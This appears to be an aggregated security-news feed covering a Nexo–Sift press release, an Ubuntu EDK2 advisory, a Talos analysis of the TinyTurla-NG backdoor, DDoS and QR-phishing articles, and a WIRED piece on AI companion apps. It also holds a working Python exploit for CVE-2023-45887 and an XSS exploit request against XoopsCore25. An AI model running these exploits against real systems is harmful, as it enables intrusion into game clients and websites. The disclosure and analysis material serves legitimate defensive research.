By Owais Sultan
February 15, 2024 – Nexo, the leading institution for digital assets, announced a partnership with Sift, the Leader…
This is a post from HackRead.com Read the original post: Nexo Teams Up with Sift for Enhanced Digital Security and User Experience

**February 15, 2024** – Nexo, the leading institution for digital assets, announced a partnership with Sift, the Leader in Digital Trust & Safety. By working with Sift, Nexo will be able to revolutionize its approach to fraud prevention, enhancing digital security measures and ensuring a safer, smoother, quicker, and more reliable experience for the company’s over 6 million users.

Nexo will utilize Sift’s industry-leading Payment Protection and Account Defense products, leveraging their advanced artificial intelligence, machine learning (ML) technology, and real-time intelligence to provide robust protection against a wide array of account and payment fraud challenges.

Payment Protection will enhance Nexo’s platform with state-of-the-art payment fraud prevention, resulting in faster transaction approvals, and improved protection of customer funds. In parallel, Sift’s Account Defense will secure user accounts by preventing account takeovers, thus accelerating Nexo’s operational efficiency, and reducing losses associated with compromised accounts.

Nexo also gains access to Sift’s Global Data Network, its consortium of customers, including dozens of the world’s top crypto exchanges. The insights gleaned from the Global Data Network will allow Nexo to prevent fraud more accurately and quickly, and reduce friction for legitimate users.

This initiative places Nexo at the forefront of identifying and preventing complex fraud patterns, enhancing the accuracy and speed of its response, and fostering trust and confidence in the blockchain space.

“The synergistic alliance between Sift and Nexo demonstrates our unwavering commitment to a user-centric ethos, harmonized with strong security and anti-fraud protocols. By harnessing Sift’s cutting-edge technology and comprehensive platform for managing digital risk, Nexo is equipped to adeptly prevent fraud while creating a streamlined experience for our users,” said Savina Boncheva, Head of Compliance at Nexo.

“The crypto community is a magnet for organized fraud actors seeking financial gain,” said Armen Najarian, Chief Marketing Officer at Sift. “By joining Sift’s global data consortium and leveraging our AI-based risk decisioning platform, crypto exchanges like Nexo can greatly reduce fraud _and_ create better experiences for legitimate users. We’re pleased to welcome Nexo to the Sift customer community and look forward to a successful and long-term partnership.”

Nexo is dedicated to continuously improving its security measures, and raising the bar for the entire industry. The partnership with Sift represents a significant step forward in Nexo’s journey towards a safer, more secure digital environment for its users.

**About Nexo**

Nexo is the world’s leading digital assets institution. The company’s mission is to maximize the value and utility of digital assets by offering a comprehensive suite of products that include advanced trading solutions for retail and institutional clients, aggregation of liquidity from leading venues, and flexible, asset-backed credit lines.

In 2022, the enterprise launched its investment arm Nexo Ventures, which now boasts over 60 portfolio companies. Nexo has processed $130+ billion for 6,000,000+ satisfied users across more than 200 jurisdictions.

**Media Contact for Nexo**

*   The Nexo PR Team
*   \[email protected\]

****About Sift****

Sift is the leader in Digital Trust & Safety, empowering digital disruptors to Fortune 500 companies to unlock new revenue without risk. Sift dynamically prevents fraud and abuse through industry-leading technology and expertise, an unrivalled global data network of one trillion (1T) events per year, and a commitment to long-term customer partnerships. Global brands such as DoorDash, Yelp, and Poshmark rely on Sift to gain a competitive advantage in their markets. Visit us at **sift.com**.

****Media Contact for Sift****

*   Victor White,
*   Senior Director, Corporate Communications
*   \[email protected\]

1.  **Powerloom to Hold First Ever Node Mint on Polygon Network**
2.  **Overworld secures $10M for cross-platform ARPG development**
3.  **Aembit Teams Up with CrowdStrike for Secure Workload Access**
4.  **READYgg Onboards 15M Web2 Players into Web3 with Aptos Labs**
5.  **Deloitte Partners with Memcyco for Digital Impersonation Protection**

Nexo Teams Up with Sift for Enhanced Digital Security and User Experience

Ubuntu Security Notice 6638-1 - Marc Beatove discovered buffer overflows exit in EDK2. An attacker on the local network could potentially use this to impact availability or possibly cause remote code execution. It was discovered that a buffer overflows exists in EDK2's Network Package An attacker on the local network could potentially use these to impact availability or possibly cause remote code execution.

    ==========================================================================Ubuntu Security Notice USN-6638-1February 15, 2024edk2 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in EDK II.Software Description:- edk2: UEFI firmware for virtual machinesDetails:Marc Beatove discovered buffer overflows exit in EDK2. An attacker on thelocal network could potentially use this to impact availability or possiblycause remote code execution. (CVE-2022-36763, CVE-2022-36764,CVE-2022-36765)It was discovered that a buffer overflows exists in EDK2's Network PackageAn attacker on the local network could potentially use these to impactavailability or possibly cause remote code execution. (CVE-2023-45230,CVE-2023-45234, CVE-2023-45235)It was discovered that an out-of-bounds read exists in EDK2's NetworkPackage An attacker on the local network could potentially use this toimpact confidentiality. (CVE-2023-45231)It was discovered that infinite-loops exists in EDK2's Network PackageAn attacker on the local network could potentially use these to impactavailability. (CVE-2023-45232, CVE-2023-45233)Mate Kukri discovered that an insecure default to allow UEFI Shell inEDK2 was left enabled in Ubuntu's EDK2. An attacker could use this tobypass Secure Boot. (CVE-2023-48733)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   efi-shell-aa64                  2023.05-2ubuntu0.1   efi-shell-arm                   2023.05-2ubuntu0.1   efi-shell-x64                   2023.05-2ubuntu0.1   ovmf                            2023.05-2ubuntu0.1   qemu-efi-aarch64                2023.05-2ubuntu0.1   qemu-efi-arm                    2023.05-2ubuntu0.1Ubuntu 22.04 LTS:   ovmf                            2022.02-3ubuntu0.22.04.2   qemu-efi                        2022.02-3ubuntu0.22.04.2   qemu-efi-aarch64                2022.02-3ubuntu0.22.04.2   qemu-efi-arm                    2022.02-3ubuntu0.22.04.2Ubuntu 20.04 LTS:   ovmf                            0~20191122.bd85bf54-2ubuntu3.5   qemu-efi                        0~20191122.bd85bf54-2ubuntu3.5   qemu-efi-aarch64                0~20191122.bd85bf54-2ubuntu3.5   qemu-efi-arm                    0~20191122.bd85bf54-2ubuntu3.5In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6638-1   CVE-2022-36763, CVE-2022-36764, CVE-2022-36765, CVE-2023-45230,   CVE-2023-45231, CVE-2023-45232, CVE-2023-45233, CVE-2023-45234,   CVE-2023-45235, CVE-2023-48733,https://bugs.launchpad.net/ubuntu/+source/edk2/+bug/2040137Package Information:   https://launchpad.net/ubuntu/+source/edk2/2023.05-2ubuntu0.1   https://launchpad.net/ubuntu/+source/edk2/2022.02-3ubuntu0.22.04.2   https://launchpad.net/ubuntu/+source/edk2/0~20191122.bd85bf54-2ubuntu3.5

Ubuntu Security Notice USN-6638-1

Proof of concept code for a flaw in DS Wireless Communication (DWC) with DWC_VERSION_3 and DWC_VERSION_11 that allows remote attackers to execute arbitrary code on a game-playing client's machine via a modified GPCM message.

# Exploit Title: DS Wireless Communication Remote Code Execution  
# Date: 11 Oct 2023  
# Exploit Author: MikeIsAStar  
# Vendor Homepage: https://www.nintendo.com  
# Version: Unknown  
# Tested on: Wii  
# CVE: CVE-2023-45887

"""This code will inject arbitrary code into a client's game.

You are fully responsible for all activity that occurs while using this code.  
The author of this code can not be held liable to you or to anyone else as a  
result of damages caused by the usage of this code.  
"""

import re  
import sys

try:  
    import pydivert  
except ModuleNotFoundError:  
    sys.exit("The 'pydivert' module is not installed !")

# Variables  
LR_SAVE = b'\x41\x41\x41\x41'  
assert len(LR_SAVE) == 0x04  
PADDING = b'MikeStar'  
assert len(PADDING) > 0x00

# Constants  
DWC_MATCH_COMMAND_INVALID = b'\xFE'  
PADDING_LENGTH = 0x23C  
FINAL_KEY = b'\\final\\'  
WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0'

def try_modify_payload(payload):  
    message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT'  
    message = re.search(message_pattern, payload)  
    if not message:  
        return None

    payload = payload[:message.end()]  
    payload += DWC_MATCH_COMMAND_INVALID  
    payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH]  
    payload += LR_SAVE  
    payload += FINAL_KEY  
    return payload

def main():  
    try:  
        with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer:  
            for packet in packet_buffer:  
                payload = try_modify_payload(packet.payload)  
                if payload is not None:  
                    print('Modified a GPCM message !')  
                    packet.payload = payload  
                packet_buffer.send(packet)  
    except KeyboardInterrupt:  
        pass  
    except PermissionError:  
        sys.exit('This program must be run with administrator privileges !')

if __name__ == '__main__':  
    main()

DS Wireless Communication Code Execution

This new backdoor we’re calling “TinyTurla-NG” (TTNG) is similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation.

Thursday, February 15, 2024 08:00

*   Cisco Talos has identified a new backdoor authored and operated by the Turla APT group, a Russian cyber espionage threat group. This new backdoor we’re calling “TinyTurla-NG” (TTNG) is similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation.
*   Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems.
*   TinyTurla-NG was seen as early as December 2023 targeting a Polish non-governmental organization (NGO) working on improving Polish democracy and supporting Ukraine during the Russian invasion. 
*   We’ve also discovered previously unknown PowerShell scripts we’re calling “TurlaPower-NG '' that are meant to act as file exfiltrators. TinyTurla-NG deployed these scripts to exfiltrate key material used to secure the password databases of popular password management software, indicating a concerted effort for Turla to steal login credentials.

Talos, in cooperation with CERT.NGO, investigated another compromise by the Turla threat actor, with a new backdoor quite similar to TinyTurla, that we are calling TinyTurla-NG (TTNG). Our findings indicate that Polish non-governmental organizations (NGOs) are actively being targeted, with at least one of them supporting Ukraine. While NGOs aren’t directly involved in conflicts they frequently participate in providing aid to entities suffering through the conflicts. Aggressor parties may deem it strategically beneficial to monitor such NGOs to keep track of ongoing and potentially new aid packages for their victims.

Turla has been widely known to target entities across the world using a huge set of offensive tools in geographies including the U.S., European Union, Ukraine and Asia. They’ve previously used malware families such as CAPIBAR and KAZUAR to target Ukrainian defense forces. After Crutch and TinyTurla, Turla has now expanded its arsenal to include the TinyTurla-NG and TurlaPower-NG malware families, while also widening its net of targets to NGOs. This activity signals the adversary’s intention to expand both their suite of malware as well as a set of targets to support Russia’s strategic and political goals.

Talos identified the existence of three different TinyTurla-NG samples, but only obtained access to two of them. This campaign’s earliest compromise date was Dec. 18, 2023, and was still active as recently as Jan. 27, 2024. However, we assess that the campaign may have started as early as November 2023 based on malware compilation dates. 

In this campaign, Turla uses compromised WordPress-based websites as command and control endpoints (C2) for the TTNG backdoor. The operators used different websites running vulnerable WordPress versions (versions including 4.4.20, 5.0.21, 5.1.18 and 5.7.2), which allowed the upload of PHP files containing the C2 code consisting of names such as: rss-old\[.\]php, rss\[.\]old\[.\]php or block\[.\]old\[.\]php

**TinyTurla-NG uses PowerShell and a command line to run arbitrary commands**

During the campaign’s three-month run, different C2 servers were also used to host PowerShell scripts and arbitrary commands that could then be executed on the victim machine.

Like TinyTurla, the malware is a service DLL, which is started via svchost.exe. The malware code itself is different and new. Different malware features are distributed via different threads. The malware is using Windows events for synchronization. In the DLL’s ServiceMain function, the first main malware thread is started.

TinyTurla-NG DLL starting the main infection thread.

The InitCfgSetupCreateEvent function initializes the config variables and the event which is used for synchronization later on. 

De-facto main function of the DLL calling code to initiate threads.

This thread then starts two more threads via the CheckOSVersion\_StartWorkerThreads function.

CheckOSVersion\_Start\_WorkerThreads function.

After checking the PowerShell and Windows versions, the first thread starts to beacon to the C2 by sending a campaign identifier (“id”) and the message “Client Ready” to register the successful infection with the C2. This is done in the C2\_client\_ready function in the screenshot below.

Thread No. 1: C2 beaconing thread.

If the registration is successful, the TTNG backdoor will ask the C2 for a task to execute (gettask\_loop function). The second thread, which was started by the CheckOSVersion\_Start\_WorkerThreads function, is responsible for executing the task command sent from the C2. It waits until the TTNG backdoor has received the response from the C2. The synchronization between the two threads is performed via the Windows event mentioned earlier. The first thread triggers the event (in the thread1\_function) once it has successfully received the task from the C2.

Thread No. 1 signals Thread No. 2 to handle the task/command received from the C2.

The tasks can be executed either using a PowerShell or command (cmd.exe) shell. The decision is made based on the PowerShell version running on the victim machine.

Thread No. 2: Windows command execution function.

When executing commands via cmd.exe or PowerShell.exe, TinyTurla-NG will create pipes to input and read the output of the commands. While executing commands via cmd.exe, the backdoor first executes the command chcp 437 > NULexecute to set the active console page to 437, i.e., the U.S., and then execute the commands issued by the C2. 

However, while executing commands via PowerShell.exe, TinyTurla-NG will additionally execute the following PowerShell cmdlet to prevent the recording of command history:

Set-PSReadLineOption -HistorySaveStyle SaveNothing

In addition to executing the content of the task received from the C2 directly e.g., C:\windows\system32\malware.exe, the backdoor will accept the following command codes from the C2. These command codes can be meant for administering the implant or for file management:

*   **“timeout”**: Change the number of minutes the backdoor sleeps between asking the C2 for new tasks. The new timeout is one minute multiplied by the timeout parameter sent by the C2. For example, if the C2 sends the task “timeout 10”, then the backdoor will now sleep for 10 minutes. If it is given a third parameter, the fail counter is changed, too.

TTNG setting a timeout value for C2 communication.

*   **“changeshell”**: This command will instruct the backdoor to switch the current shell being used to execute commands, i.e., from cmd.exe to PowerShell.exe, or vice versa.
*   **“changepoint”**: This command is used to likely tell the implant to switch to the second C2 URL present in the implant.
*   **“get”**: Fetch a file specified by the C2 using an HTTP GET request and write it to the specified location on disk.
*   **“post”**: Exfiltrate a file from the victim to the C2, e.g., post C:\some_file.bin.
*   **“killme”**: Create a BAT file (see below) with a name based on the current tick count. Then, use the BAT file to delete a file from the disk of the victim machine, e.g., killme <filename>. The BAT file is executed via cmd.exe /c <BAT-file-name>.bat. 

The killme command generates a batch file with the content below. It is interesting to note that the backdoor DLL is essentially a service, however, the batch script deletes a registry key in HKCU\SW\classes\CLSID and restarts explorer\[.\]exe indicating an attempt to create persistence using COM hijacking, a tactic Turla has used in the past to establish persistence for their malware.

Registry key deleted:

HKEY\_CURRENT\_USER\\Software\\Classes\\CLSID\\{C2796011-81BA-4148-8FCA-C6643245113F}

BAT file contents template.

The BAT file is created from the template where the first two “%s” are replaced with the DLL name and the last one with the name of the BAT file itself to delete both artifacts from the disk.

**TurlaPower-NG and its exfiltration capabilities**

Talos also discovered malicious PowerShell scripts we’re calling “TurlaPower-NG”, written to infected endpoints via the TTNG backdoor. The scripts consist of the C2 URL and target file paths. For each file path specified, the script will recursively enumerate files and add them to an archive on disk. TurlaPower-NG takes specific care to exclude files with the “.mp4” extension from being added to the archive. The attackers had a specific interest in key material used to secure the password databases and popular password management software, adding related files to the archive:

TurlaPower-NG’s file archiving function.

The archive is a “.zip” extension whose name is generated on the fly by generating a new GUID which is used as the archive name. The archive file is then exfiltrated to the C2 using HTTP/S POST requests along with a log of the activity performed being sent to the C2 as well. The log consists of:

*   Name of the archive file (or part) POSTed to the C2.
*   Number of files in the archive along with the archive size.

TurlaPower-NG’s archive filename generation and log generation for C2.

**C2 setup and operations**

All of the C2 servers discovered so far consist of legitimate, vulnerable WordPress-based websites compromised by Turla to set up their C2 servers. Once compromised the operators set up scripts, logging and data directories to operate their C2 servers.

**Directory and file structure**

The C2’s directories and files setup consists of three key components:

*   **C2 scripts**: Turla set up PHP scripts ending with extensions — “.old.php” — in certain directories of the compromised websites. The URLs for these PHP-based C2s were then coded into the TTNG backdoors consisting of two C2 URLs per sample.
*   **Logging**: In addition to the C2 PHP scripts, the adversary also set up the logging of infections to keep track of infected systems and commands being issued to them. The logging mechanism of the C2 generates three log files on the C2 server:
    *   **\_log\[.\]txt**: A log of all infected endpoints beaconing into the C2.
    *   **result\[.\]txt**: A log of all messages received from the TTNG backdoor.
    *   **tasks\[.\]txt**: A log of all commands issued to the infected hosts.
*   **Data directories**: TTNG and TurlaPower-NG both support the exfiltration of files to the C2 server. The C2 server stores stolen data in directories separate from the logging directories.

Sample directory listing of the logs of the C2 server.

**C2 communication process**

The TinyTurla-NG backdoor uses a specific Identifier, “id” value in its HTTP form data whenever it communicates with the C2 server. This ID value is an eight-character phrase hardcoded into the backdoor. 

Network capture displaying the Identifier value and “Client Ready” message.

This same identifier value is then used to create directories for log files on the C2 server indicating that the C2 server maintains different log files for different identifiers.

After registering the victim on the C2 server, the backdoor sends out a gettask request, similar to the one below. The C2 can answer this with special commands or just the file that is supposed to be executed on the infected machine. 

TTNG’s C2 communication to fetch tasks to perform on the infected endpoint.

Depending on the PowerShell version running on the victim machine, the C2 task commands are piped into a PowerShell or cmd\[.\]exe shell. 

TinyTurla-NG’s shell selection between PowerShell or cmd\[.\]exe.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCs**

IOCs for this research can also be found at our GitHub repository here.

**Hashes**

267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b  
d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40

**Domains**

hanagram\[.\]jp  
thefinetreats\[.\]com  
caduff-sa\[.\]ch  
jeepcarlease\[.\]com  
buy-new-car\[.\]com  
carleasingguru\[.\]com

TinyTurla Next Generation - Turla APT spies on Polish NGOs

By Waqas
Is your ChatGPT down? Or, are you experiencing issues accessing ChatGPT? If so, you’re not alone. ChatGPT has…
This is a post from HackRead.com Read the original post: ChatGPT Down? Anonymous Sudan Claims Responsibility for DDoS Attacks

Is your ChatGPT down? Or, are you experiencing issues accessing ChatGPT? If so, you’re not alone. ChatGPT has been encountering service disruptions and numerous errors lately. The cause appears to be DDoS attacks, possibly instigated by Anonymous Sudan.

Anonymous Sudan, a now prominent group of hacktivists, has claimed responsibility for targeting ChatGPT and its parent company, OpenAI, with a series of DDoS attacks.

Anonymous Sudan also referenced alleged tweets attributed to Tal Broda, Head of Research Platform at OpenAI. The screenshots of these tweets depict Tal denying the existence of Palestine and criticizing calls for a ceasefire in Gaza.

According to Anonymous Sudan, they plan to continue their DDoS attacks until OpenAI implements behavioural changes to ChatGPT to prevent the propagation of what they deem as “dehumanizing views of Palestinians.” Additionally, they demand the removal of Tal Broda from his position at OpenAI.

Anonymous Sudan on Telegram (Screenshots: Hackread.com)

On the contrary, ChatGPT’s Status Page confirms service disruptions, including login issues. It also notes an “Elevated error rate impacting ChatGPT,” indicating a higher-than-usual number of errors occurring within the system or process. Such errors could arise from various factors, including faulty hardware, software bugs, network issues, DDoS attacks, or even human error.

Nevertheless, OpenAI is actively monitoring the situation and working to resolve the issue. However, as of now, there has been no official confirmation or acknowledgement from OpenAI regarding the company experiencing cyber attacks or the specific reasons behind the ChatGPT errors that users have been reporting since this afternoon.

****Anonymous Sudan vs ChatGPT and OpenAI****

This isn’t the first instance where Anonymous Sudan has claimed responsibility for DDoSing ChatGPT. Last November, the group made similar claims, and OpenAI acknowledged that its infrastructure was indeed targeted by DDoS attacks.

For expert commentary, we reached out to Oded Vanunu, Head of Product Vulnerability Research at Check Point Software. Vanunu linked Anonymous Sudan’s DDoS attacks to a strategy aimed at garnering media attention.

“Russian-affiliated groups Anonymous Sudan and SkyNet have claimed responsibility for the latest outages on the OpenAI website and ChatGPT service. This is according to an ‘official spokesperson’ for Anonymous Sudan going by the name of Crush on Telegram,” said Oded.

“Hacktivists often look for high-profile targets to disrupt in order to bring attention to themselves and in this case, Crush claims the groups attacked OpenAI due to the company’s perceived support of Israel.”

****Anonymous Sudan’s Recent Activities****

Anonymous Sudan has been notably active in recent times. According to a recent report by Hackread.com, the group has conducted DDoS attacks on various targets, including the Israeli BAZAN Group and the United Arab Emirates-based FlyDubai Airline.

Furthermore, the group targeted Thuraya Mobile Satellite Communications Company, an international mobile-satellite service (MSS) provider headquartered in Dubai, United Arab Emirates (UAE). In both attacks on UAE-based infrastructure, Anonymous Sudan claimed that the UAE’s support for the Rapid Support Forces (RSF) was evident through communication channels.

It’s worth noting that the RSF is a paramilitary force previously operated by the Government of Sudan and has been accused by hacktivists of committing war crimes against the Sudanese people.

1.  **Hackers Target Israeli Rocket Alert App Users with Spyware**
2.  **10 Top DDoS Attack Protection and Mitigation Companies in 2023**
3.  **Google, Cloudflare and AWS Disclose Largest DDoS Attack in History**
4.  **Hackers Send Fake Rocket Alerts to Israelis via Hacked Red Alert App**
5.  **Researchers Leverage ChatGPT to Expose Notorious macOS Malware**
6.  **WormGPT – Malicious ChatGPT Alternative Empowering Cybercriminals**

ChatGPT Down? Anonymous Sudan Claims Responsibility for DDoS Attacks

QR code attacks are particularly dangerous because they move the attack vector off a protected computer and onto the target’s personal mobile device, which usually has fewer security protections in place and ultimately has the sensitive information that attackers are after.

Wednesday, February 14, 2024 08:00

Though QR codes were once on the verge of extinction, many consumers are used to seeing them in the wild for ordering at restaurants, or as mainstays on storefront doors informing customers how they can sign up for a newsletter or score a sweet deal. 

The use of QR codes saw a resurgence during the COVID-19 pandemic as a non-contact way for consumers to obtain important information. And as they’ve become more prevalent, attackers have taken notice, too, increasingly deploying them in phishing and email-based attacks. 

There was a significant increase in QR code phishing in 2023, according to public reporting and recently collected data from Cisco Talos Incident Response (Talos IR).  

As highlighted in our latest Quarterly Trends report, Talos IR responded to a QR code phishing campaign for the first time in an engagement in the fourth quarter of 2023, where threat actors tricked victims into scanning malicious QR codes embedded in phishing emails with their personal mobile devices, thereby leading to malware being executed on the mobile devices.  

In a separate attack, the adversaries sent targets spear-phishing emails with malicious QR codes pointing to fake Microsoft Office 365 login pages that eventually steal the user’s login credentials when entered.  

QR code attacks are particularly dangerous because they move the attack vector off a protected computer and onto the target’s personal mobile device, which usually has fewer security protections in place and ultimately has the sensitive information that attackers are after. 

**How is a QR code lure different from a traditional malicious attachment or link? **

“Traditional” phishing attacks usually involve an adversary writing a highly targeted email hoping to trick a user into opening a malicious attachment or link that points to an attacker-controlled page. 

Phishing emails, such as business email compromise, are usually meant to impersonate an individual or organization the target is familiar with and willing to open something like a Microsoft Word document or URL that they would normally trust.  

These are typically links included in the body of an email, hyperlinked to a few words of text, or attachments to the emails with text prompting the user to open the attachment. 

In the case of QR code attacks, the adversary embeds a QR code in the body of the phishing email and asks the target to scan it with a mobile device to open a specific attachment or web link. As with any other QR code, the target would have to use a QR code-scanning app on their mobile device or the built-in scanning functions on native camera apps to open the requested link.  

What’s on the end of these QR codes varies greatly. Attackers could use the QR code to point to an attacker-controlled web page that looks like a legitimate login page, but instead steals the user’s credentials when they go to log in. Or it can lead to a malicious attachment that eventually installs malware on the target’s device.  

**What makes the use of QR codes in attacks so dangerous? **

Many corporate-owned computers and devices will have built-in security tools designed to detect phishing and preventing users from opening malicious links. However, when a personal device is introduced to the equation, these tools are no longer effective.  

When the target uses their personal device to scan a malicious QR code, the attack surface shifts, as enterprise security protocols and monitoring systems have less control and visibility over personal devices. And not all email security solutions can detect malicious QR codes like they would with malicious email attachments.  

With remote work expanding after the COVID-19 pandemic, more employees are accessing business information from their mobile devices, making these attacks more likely. According to the 2023 Not (Cyber) Safe for Work Report, which is a quantitative survey performed by the cybersecurity firm Agency, 97 percent of respondents access their work accounts from their personal devices. This potentially exposes sensitive business information in QR code attacks, should adversaries be able to capture internal login credentials or downloaded files on the targeted device.  

**Prevention **

To defend against QR code-based phishing attacks, users and organizations should follow several pieces of advice: 

*   Talos recommends organizations deploy a mobile device management (MDM) platform or similar mobile security tool, such as Cisco Umbrella, to all unmanaged mobile devices that have access to business information. Cisco Umbrella’s DNS-layer security is available for personal Android and iOS devices, which provides defenders with additional visibility while protecting the privacy of mobile device owners. 
*   User education is at the core of preventing QR code-based phishing attacks. Executives and defenders should ensure all employees are educated on the dangers of phishing attacks and adversaries’ increasing use of QR codes in malicious emails. 
    *   Malicious QR codes may have a poor image quality or look blurry when embedded in an email. This could be an initial sign that the QR code is not legitimate. 
    *   QR code scanners will often provide a preview of the link the code is pointing to. Inform users that they should only be visiting trusted web pages with URLs they recognize. Alternatively, they could use their managed device to manually type in the desired destination URL instead of using the QR code as a navigation method. 
    *   Look for common red flags in phishing emails, such as typosquatted email addresses and typos or grammatical errors in the body text of the email. 
    *   Never give out personal information unless you’ve confirmed the legitimacy of a QR code with the organization in question. 
*   Using multi-factor authentication protocols such as Cisco Duo can prevent credential stealing, which often provides threat actors with an initial foothold into targeted systems to send more convincing phishing emails from trusted business associates or teammates.

How are attackers using QR codes in phishing emails and lure documents?

Romantic chatbots collect huge amounts of data, provide vague information about how they use it, use weak password protections, and aren’t transparent, new research from Mozilla says.

You shouldn’t trust any answers a chatbot sends you. And you probably shouldn’t trust it with your personal information either. That’s especially true for “AI girlfriends” or “AI boyfriends,” according to new research.

An analysis into 11 so-called romance and companion chatbots, published on Wednesday by the Mozilla Foundation, has found a litany of security and privacy concerns with the bots. Collectively, the apps, which have been downloaded more than 100 million times on Android devices, gather huge amounts of people’s data; use trackers that send information to Google, Facebook, and companies in Russia and China; allow users to use weak passwords; and lack transparency about their ownership and the AI models that power them.

Since OpenAI unleashed ChatGPT on the world in November 2022, developers have raced to deploy large language models and create chatbots that people can interact with and pay to subscribe to. The Mozilla research provides a glimpse into how this gold rush may have neglected people’s privacy, and into tensions between emerging technologies and how they gather and use data. It also indicates how people’s chat messages could be abused by hackers.

Many “AI girlfriend” or romantic chatbot services look similar. They often feature AI-generated images of women which can be sexualized or sit alongside provocative messages. Mozilla’s researchers looked at a variety of chatbots including large and small apps, some of which purport to be “girlfriends.” Others offer people support through friendship or intimacy, or allow role-playing and other fantasies.

“These apps are designed to collect a ton of personal information,” says Jen Caltrider, the project lead for Mozilla’s Privacy Not Included team, which conducted the analysis. “They push you toward role-playing, a lot of sex, a lot of intimacy, a lot of sharing.” For instance, screenshots from the EVA AI chatbot show text saying “I love it when you send me your photos and voice,” and asking whether someone is “ready to share all your secrets and desires.”

Caltrider says there are multiple issues with these apps and websites. Many of the apps may not be clear about what data they are sharing with third parties, where they are based, or who creates them, Caltrider says, adding that some allow people to create weak passwords, while others provide little information about the AI they use. The apps analyzed all had different use cases and weaknesses.

Take Romantic AI, a service that allows you to “create your own AI girlfriend.” Promotional images on its homepage depict a chatbot sending a message saying,“Just bought new lingerie. Wanna see it?” The app’s privacy documents, according to the Mozilla analysis, say it won’t sell people’s data. However, when the researchers tested the app, they found it “sent out 24,354 ad trackers within one minute of use.” Romantic AI, like most of the companies highlighted in Mozilla’s research, did not respond to WIRED’s request for comment. Other apps monitored had hundreds of trackers.

In general, Caltrider says, the apps are not clear about what data they may share or sell, or exactly how they use some of that information. “The legal documentation was vague, hard to understand, not very specific—kind of boilerplate stuff,” Caltrider says, adding that this may reduce the trust people should have in the companies.

‘AI Girlfriends’ Are a Privacy Nightmare

XoopsCore25 version 2.5.11 suffers from a cross site scripting vulnerability.

    ## Title: XoopsCore25-2.5.11-XSS-Reflected## Author: nu11secur1ty## Date: 02/12/2024## Vendor: https://xoops.org/## Software: https://github.com/XOOPS/XoopsCore25/releases/tag/v2.5.11## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected## Description:The value of the yname request parameter is copied into the value ofan HTML tag attribute which is encapsulated in single quotation marks.The payload '>333< was submitted in the yname parameter. This inputwas echoed unmodified in the application's response. The attacker cantrick the user to visit very dangerous and malicious URL in thissessionSTATUS: HIGH Vulnerability[+]Exploit execution:```POSTPOST /XoopsCore25-2.5.11/htdocs/misc.php HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflate, brAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160Safari/537.36Connection: closeCache-Control: max-age=0Cookie: xoops_session_65ca21e5=1mc2a5bq1c0m2kh9j1qn5ilqmnOrigin: https://pwnedhost.comUpgrade-Insecure-Requests: 1Referer: https://pwnedhost.com/XoopsCore25-2.5.11/htdocs/misc.php?action=showpopups&type=friend&op=sendform&t=1707748563Content-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 148yname=VHBoIy'%3e%3ccXWog%3c&ymail=VHBoIy&fname=VHBoIyxV&fmail=VHBoIy&submit=Send&XOOPS_TOKEN_REQUEST=8a6867d76a2aace97646eefb42934056&action=showpopups&type=friend```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/xoops.org/XoopsCore25-2.5.11)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/02/xoopscore25-2511-xss-reflected.html)## Time spent:01:17:00

XoopsCore25 2.5.11 Cross Site Scripting

Although considered of moderate risk, one of the vulnerabilities is being actively exploited in the wild — CVE-2024-21351, a security feature bypass vulnerability in Windows SmartScreen.

Tuesday, February 13, 2024 13:59

Microsoft followed up one of the lightest recent Patch Tuesdays in January with a large release of vulnerabilities on Tuesday, although still far from numbers seen in the past. 

In all, February’s security update from Microsoft includes 75 vulnerabilities, three of which are considered critical. There are 69 “important” vulnerabilities, according to Microsoft, and three that are of “moderate” severity.

